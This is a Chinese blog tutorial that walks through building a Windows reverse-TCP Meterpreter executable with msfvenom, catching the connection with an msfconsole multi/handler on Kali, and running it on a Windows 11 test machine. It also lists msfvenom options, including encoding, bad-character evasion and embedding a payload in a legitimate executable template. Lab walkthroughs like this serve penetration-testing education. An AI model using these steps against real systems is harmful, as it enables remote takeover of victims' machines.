Meterprete实现远控

一、Meterprete

Meterpreter是Metasploit Framework中的关键组件,它作为漏洞利用后的攻击载荷,提供纯内存工作模式,无需磁盘写入,且支持加密通信。Meterpreter允许进行进程迁移、密码哈希获取、权限提升等高级渗透测试操作。基本命令如进程迁移、系统信息收集和文件操作。

二、恶意远控软件生成

工具:kali(攻击者),windows11(被攻击者)

1
msfvenom -p 被攻击计算机系统(windows或者linux)/处理器体系结构(x64或者x32)/meterpreter/reverse_tcp lhost=攻击者的ip lport=设置端口号 -f exe -o 软件存放路径

以上参数介绍

1
2
3
4
5
6
7
8
9
-p, --payload < payload> 指定需要使用的payload(攻击荷载)。可以使用自定义payload,几乎支持全平台的

-f, --format < format> 指定输出格式

-o, --out < path> 指定创建好的payload的存放位置

lhost, location host 本地ip

lport, location port 本地端口

三、检测恶意软件

将生成软件放到检测网站检测测

四、远控步骤

1.kali中打开控制端

1
msfconsole

2.利用Meterpreter中的模块exploit/mutil/handler

1
use exploit/multi/handler

3.设置相关配置(荷载,ip,端口等)

4.在windows11中打开恶意软件
这里目录中存在main文件夹,里面我采访了一些内容,方便稍后测试

5.返回kali中看到命令行出现变化,进行操作


入侵成功!

五、Msfvenom相关参数

--list 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,......all
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
 
-p, --payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的

-f, --format < format> 指定输出格式

-e, --encoder <encoder> 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload

-a, --arch < architecture> 指定payload的目标架构,例如x86 还是 x64 还是 x86_64

-o, --out < path> 指定创建好的payload的存放位置

-b, --bad-chars < list> 设定规避字符集,指定需要过滤的坏字符。例如:不使用 '\x0f'、'\x00'

-n, --nopsled < length> 为payload预先指定一个NOP滑动长度

-s, --space < length> 设定有效攻击荷载的最大长度,就是文件大小

-i, --iterations < count> 指定payload的编码次数

-c, --add-code < path> 指定一个附加的win32 shellcode文件

-x, --template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行

-v, --var-name < value> 指定一个自定义的变量,以确定输出格式

-t, --timeout <second> 从stdin读取有效负载时等待的秒数(默认为30,0表示禁用)

-h,--help 查看帮助选项

--platform < platform> 指定payload的目标平台

Meterprete实现远控
http://example.com/2024/10/24/Meterprete木马远控/
作者
印星
发布于
2024年10月24日
许可协议